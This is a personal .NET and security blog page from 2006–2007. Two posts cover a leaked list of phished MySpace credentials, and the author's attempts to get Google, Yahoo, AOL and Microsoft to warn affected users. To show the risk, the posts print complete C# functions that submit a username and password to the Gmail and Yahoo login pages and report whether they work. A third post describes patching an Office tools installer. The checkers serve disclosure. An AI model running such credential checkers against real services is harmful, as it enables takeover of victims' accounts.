If at first you don't succeed; call it version 1.0
Friday, 26 January 2007

Almost two weeks after I've sent the first mails, and after sending two more follow-up mails asking if there are any updates regarding this issue, I got only one more response - from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use:  “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to any law school, but from what I can understand from the first line of the terms is that  these “terms of use” are only for Gmail registered users.  So, if an attacker will brute force the MySpace phishing list and will find a valid Gmail username/password and use it, he will not violate these terms because he hasn’t registered to that account and therefore he doesn’t need to read or agree to the terms. I’ve sent this comment to Google.

I'm still waiting for a respond from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers list, the following is a modified version of the Gmail account validator. This time, for Yahoo! Mail:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
"&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login="
+ username + "&passwd=" + password + "&.save=Sign+In";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.replace") > -1) ? 1 : (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1) ? 0 : -1;
}


Friday, 26 January 2007 15:15:30 UTC | Comments [0] | .NET | Security#
Tuesday, 16 January 2007

Yesterday, a huge list of MySpace accounts’ usernames and passwords was revealed to the public. This list was harvested by phishers.
Most of those MySpace accounts’ usernames are emails of the following webmail accounts: GMAIL, Hotmail, Yahoo! Mail and AOL.
Some of those poor MySpace users are probably using the same password in their MySpace account for their webmail account, and probably for other web services too (ebay/Amazon/etc).
Brute forcing those web services to extract the valid credentials from the phishers list is very easy. So, I’ve decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to analyze the phishers list against their own database in order to warn the poor users to change their passwords as soon as possible.
Over 21 hours later, and only AOL have responded to my suggestion/request.
AOL's response (10 minutes after I’ve sent the mail!) :


Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities


Just to demonstrate how easy is to extract the valid username/password from the phishers list, the following are 20 lines of C# code which validates username and password of a GMAIL account:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidGmailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://www.google.com/accounts/ServiceLogin";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = "?service=mail&Email=" + username + "&Passwd=" + password + "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.href") > -1) ? 1 : (resp.IndexOf("<form action=\"LoginAuth\"") > -1) ? 0 : -1;
}


Tuesday, 16 January 2007 19:04:06 UTC | Comments [1] | .NET | Security#
Tuesday, 06 June 2006

After I installed the new beta 2 release of MS Office 2007, I've encountered a problem creating new VSTO (Visual Studio Tools for Office) 2005 projects.

The first google search result for VSTO 2007 was this post, encouraging me to download the VSTO 2007 (v3) June CTP.

Unfortunately, for some unknown reason this VSTO 2007 CTP version requires the WinFX February CTP to be installed.

As I've already installed the new beta 2 release of WinFX, and I didn't want to rollback to the old February CTP version, I've decided to hack the VSTO 2007 installer:

  1. I've extracted the provided EXE file (self extracted zip file). One of the extracted files was the MSI installer.
  2. I've opened the MSI file using ORCA, and looked for 'WinFX'.
  3. I've found out that the installer is checking if 'InstallSuccess' registry value exists under 'SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Indigo' registry key. But, in WinFX beta 2 they've changed the path to 'SOFTWARE\Microsoft\WinFX RunTime\3.0\Setup\Windows Communication Foundation'. So, I've edited the value in the MSI and saved it.

The installation went without any problem, and I was able to create new VSTO projects under Visual Studio 2005.

The hacked version of VSTO 2007 (v3) June CTP can be found here: vsto3ctp.zip (1.34 MB)

Disclaimer: You may download and use the hacked version at your own risk.


Tuesday, 06 June 2006 08:50:41 UTC | Comments [1] | .NET#
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.